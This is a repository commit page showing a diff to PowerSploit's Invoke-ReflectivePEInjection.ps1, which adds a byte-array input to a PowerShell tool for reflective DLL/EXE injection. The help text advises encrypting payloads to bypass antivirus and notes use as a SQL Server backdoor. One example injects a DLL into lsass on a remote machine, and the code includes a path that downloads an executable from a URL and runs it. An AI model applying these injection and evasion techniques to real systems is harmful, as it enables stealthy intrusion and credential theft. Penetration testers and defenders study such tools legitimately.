Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge pull request #61 from clymb3r/master 

Adding PEBytes parameter
This commit is contained in:
Matt Graeber 2015-01-26 12:30:28 -05:00
parent b0cdb2b754 93bc214659
commit a574705ce2
1 changed files with 17 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
CodeExecution/Invoke-ReflectivePEInjection.ps1
View File

@ -23,7 +23,7 @@ from the DLL. The script doesn't wait for the DLL to complete execution, and doe
remote process. remote process.
While this script provides functionality to specify a file to load from disk or from a URL, these are more for demo purposes. The way I'd recommend using the script is to create a byte array While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array
containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will
bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba
blog linked below (thanks to whitey). blog linked below (thanks to whitey).
@ -33,7 +33,7 @@ Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None
Version: 1.3 Version: 1.4
.DESCRIPTION .DESCRIPTION
@ -47,6 +47,10 @@ The path of the DLL/EXE to load and execute. This file must exist on the compute
A URL containing a DLL/EXE to load and execute. A URL containing a DLL/EXE to load and execute.
.PARAMETER PEBytes
A byte array containing a DLL/EXE to load and execute.
.PARAMETER ComputerName .PARAMETER ComputerName
Optional, an array of computernames to run the script on. Optional, an array of computernames to run the script on.
@ -107,6 +111,11 @@ Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4"
Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.
Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local
.EXAMPLE
Load a PE from a byte array.
Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4"
.NOTES .NOTES
GENERAL NOTES: GENERAL NOTES:
The script has 3 basic sets of functionality: The script has 3 basic sets of functionality:
@ -183,6 +192,11 @@ Param(
[Uri] [Uri]
$PEUrl, $PEUrl,
[Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)]
[ValidateNotNullOrEmpty()]
[Byte[]]
$PEBytes,
[Parameter(Position = 1)] [Parameter(Position = 1)]
[String[]] [String[]]
$ComputerName, $ComputerName,
@ -2886,14 +2900,12 @@ Function Main
Write-Verbose "PowerShell ProcessID: $PID" Write-Verbose "PowerShell ProcessID: $PID"
[Byte[]]$PEBytes = $null
if ($PsCmdlet.ParameterSetName -ieq "LocalFile") if ($PsCmdlet.ParameterSetName -ieq "LocalFile")
{ {
Get-ChildItem $PEPath -ErrorAction Stop | Out-Null Get-ChildItem $PEPath -ErrorAction Stop | Out-Null
[Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath))
} }
else elseif ($PsCmdlet.ParameterSetName -ieq "WebFile")
{ {
$WebClient = New-Object System.Net.WebClient $WebClient = New-Object System.Net.WebClient